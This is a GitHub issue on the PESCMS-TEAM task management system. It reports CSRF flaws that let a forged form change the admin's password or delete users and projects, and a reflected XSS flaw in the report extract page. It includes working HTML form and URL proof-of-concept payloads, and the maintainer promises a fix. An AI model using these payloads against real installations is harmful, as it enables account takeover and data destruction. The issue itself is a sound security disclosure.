search

lazyphp / PESCMS-TEAM

The open source task management system
GNU General Public License v2.0
84 stars 36 forks source link

There are some vulnerabilities in cms. #7

Open RO6OTXX opened 3 years ago

RO6OTXX commented 3 years ago

Cross Site Request Forgery(CSRF)-1

modify admin's password ,mail,phone and head-image.

Technical Description: file : pescms/App/Team/PUT/User.php

The function of this file is to Modify personal information,but it don't Verify whether the operation is legal. Through it attackers can modify admin's password ,mail,phone and head-image.

Proof of Concept(PoC) 

  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/pescms/Public/?g=Team&m=User&a=setting" method="POST">
      <input type="hidden" name="method" value="PUT" />
      <input type="hidden" name="name" value="admin" />
      <input type="hidden" name="mail" value="123456&#64;qq&#46;com" />
      <input type="hidden" name="phone" value="" />
      <input type="hidden" name="password" value="newadmin" />
      <input type="hidden" name="home" value="Team&#45;Index&#45;index" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

1

Success.And the password of admin has been modify.
2

Cross Site Request Forgery(CSRF)-2

Delete the administrator and other member's account number

Technical Description: file: 

pescms/App/Team/DELETE/Content.php
pescms/App/Team/DELETE/Field.php

Throught it can delete Any member and administrator just by modify the 'id' that in Url. Delete the Account number of administrator just need to modify the id as '1'.
3

Proof of Concept(PoC) 

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/pescms/Public/?g=Team&m=User&a=action&id=36&method=DELETE&back_url=L3Blc2Ntcy9QdWJsaWMvP2c9VGVhbSZtPVVzZXImYT1pbmRleA==" method="POST">
      <input type="hidden" name="" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Visit this page of poc:
4 5

We refresh the list of user ,that find that the user that called light is deleted.
6

Cross Site Request Forgery(CSRF)-3

Delete import information

Technical Description: file: 

pescms/App/Team/DELETE/Attachment.php
pescms/App/Team/DELETE/Content.php
pescms/App/Team/DELETE/Field.php
pescms/App/Team/DELETE/Model.php
pescms/App/Team/DELETE/Notice.php

Through CSRF to Delete important data is exist in these files.

ALL the delete operations are not verify in front page. Like this:
7

Proof of Concept(PoC)

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/pescms/Public/?g=Team&m=Project&a=action&id=1&method=DELETE&back_url=L3Blc2Ntcy9QdWJsaWMvP2c9VGVhbSZtPVByb2plY3QmYT1pbmRleA==" method="POST">
      <input type="hidden" name="" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

8 refresh:
9

And other operations of delete are exist on this cms. Just give the positions,don't prove.
10 11

Reflected XSS in App/Team/GET/Repoort.php

In the method of extract, the CSRF also exist , but this is to prove the Rdflected XSS,not CSRF.

In line 72-78 , the data from $_GET('begin') and $_GET('end') is transfer to variables, and output in pages.
12

Proof of Concept(PoC) 

localhost/pescms/Public/?g=Team&m=Report&a=extract&begin="onmouseover=alert(1)//&end=&user=0
or 
localhost/pescms/Public/?g=Team&m=Report&a=extract&begin=&end="onmouseover=alert(1)//&user=0
or,page:
http://localhost/pescms/Public/?g=Team&m=Report&a=allExtract&begin="onmouseover=alert(1)//&end=&user=0

13

In this page ,Reflected XSS can be combined with CSRF,this will cause bigger destruction

lazyphp commented 3 years ago

thank you for reporting program bug. I will fix it .